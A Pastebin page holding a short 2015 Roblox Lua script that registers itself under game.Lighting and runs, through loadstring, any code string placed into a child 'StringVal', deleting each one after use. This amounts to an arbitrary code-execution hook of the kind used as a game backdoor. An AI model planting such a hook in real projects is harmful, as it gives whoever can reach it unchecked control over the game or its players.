jordan83221

adgaeg

Nov 28th, 2015
134
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 0.33 KB | None | 0 0
  1. local next=next
  2. script.Name="Test"
  3. local val=Instance.new("ObjectValue",game.Lighting)
  4. val.Name="Potatoes"
  5. val.Value=script
  6. coroutine.resume(coroutine.create(function()
  7.     while wait() do
  8.         if script:findFirstChild("StringVal") then
  9.             local val=script.StringVal
  10.             loadstring(val.Value)()
  11.             val:Destroy()
  12.         end
  13.     end
  14. end))
Advertisement
Add Comment
Please, Sign In to add comment